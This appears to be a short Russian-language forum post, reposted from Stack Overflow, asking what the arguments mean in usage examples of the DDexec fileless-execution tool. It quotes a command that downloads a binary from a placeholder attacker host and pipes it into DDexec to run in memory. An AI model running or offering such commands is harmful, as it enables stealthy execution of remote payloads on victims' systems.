Я нашел отличный инструмент безопасности, который скрывает инструменты. В официальном репозитории GitHub есть несколько примеров, например: «base64 -w0 /bin/ls | bash ddexec.sh ls -lA’ и ‘wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar' Но я не понимаю аргументы «ls -lA» в этих примерах и «argv0 foo bar» в этих примерах.
Я также ссылаюсь на некоторые статьи типа «https://wazuh.com/blog/detecting-living ... ith-wazuh/» Я также не понимаю значения «/bin/PlaceHolder /etc/passwd 1 0 ».
Подробнее здесь: https://stackoverflow.com/questions/791 ... ool-ddexec